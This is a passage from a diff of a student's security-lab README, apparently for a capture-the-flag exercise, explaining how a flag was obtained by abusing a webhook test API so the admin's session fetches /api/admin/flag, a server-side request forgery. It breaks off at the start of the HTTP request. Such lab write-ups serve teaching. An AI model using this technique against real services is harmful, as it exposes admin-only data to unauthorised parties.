RobertsonRhyan/slh_lab01/README.md

 ### 4.3.
 How did you obtain the flag?
 Describe clearly your attack

 We can use the test api to get the server admin to access a url and send us a response.
-SO even that
+Since the admin has the access rights to /api/admin/flag, we get the flag in response :

+The request :

 ```http
 POST /api/webhook/test HTTP/1.1